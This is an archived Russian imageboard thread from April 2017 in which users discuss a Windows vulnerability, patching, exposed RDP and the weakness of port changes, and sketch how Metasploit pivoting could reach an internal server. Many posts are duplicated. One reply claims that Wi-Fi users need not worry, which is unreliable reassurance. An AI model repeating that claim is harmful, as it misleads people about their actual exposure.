Не, обычные обновления для винды, на KB/MS начинаются. Накати вот это - https://www.microsoft.com/en-us/download/details.aspx?id=50027, чтобы быть спокойным
Не, обычные обновления для винды, на KB/MS начинаются. Накати вот это - https://www.microsoft.com/en-us/download/details.aspx?id=50027, чтобы быть спокойным
Ответы151227848
>>151227743
Ну это такая себе защита, никакая, службы палятся тем же нмапом по сигнатурам.
>менять номера дефолтных портов
Ну это такая себе защита, никакая, службы палятся тем же нмапом по сигнатурам.
Ответы151227998
>>151227791
Блядь, как ты себе представляешь сервер с данными, имеющим на сетевой карте реальный белый ip? Я такого даже в цирке не видел.
> челиков с включенным рдп еще нужно попробовать найти.
Блядь, как ты себе представляешь сервер с данными, имеющим на сетевой карте реальный белый ip? Я такого даже в цирке не видел.
>>151227714
Роутер не панацея - в них тоже есть уязвимости и места для атак. Но в целом это конечно уменьшает шансы вляпаться.
Нет, обновления безопасности для твоей версии. По умолчанию в винде включены автоматические обновления. Смотри у себя в системе "обновления windows"
> Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
Роутер не панацея - в них тоже есть уязвимости и места для атак. Но в целом это конечно уменьшает шансы вляпаться.
> под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
Нет, обновления безопасности для твоей версии. По умолчанию в винде включены автоматические обновления. Смотри у себя в системе "обновления windows"
>>151184817 (OP)
Это как то может коснуться тех, кто сидит на 10ке и юзает вайфай роутер? Что может случится с такими людьми? Расскажите пжлст.
Это как то может коснуться тех, кто сидит на 10ке и юзает вайфай роутер? Что может случится с такими людьми? Расскажите пжлст.
>>151227932
Раз вайфай, то беспокоиться не о чем
Раз вайфай, то беспокоиться не о чем
>>151227904
Я не >>151227791, но всё же. Представь, на одной из машин в сети появляется малварь (спам, флэха с автораном, еще какая-нибудь дрисня, придумай сам). Подгружается этот же msf, делается pivoting, через поднятый туннель ломается этот злосчастный сервак.
Я не >>151227791, но всё же. Представь, на одной из машин в сети появляется малварь (спам, флэха с автораном, еще какая-нибудь дрисня, придумай сам). Подгружается этот же msf, делается pivoting, через поднятый туннель ломается этот злосчастный сервак.
>>151227858
Где? На маршрутизаторе, с прописанным белым списком доступа?
> службы палятся тем же нмапом по сигнатурам
Где? На маршрутизаторе, с прописанным белым списком доступа?
>>151227904
VPS?
VPS?
Тред утонул или удален.
Это копия, сохраненная 18 апреля 2017 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Это копия, сохраненная 18 апреля 2017 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.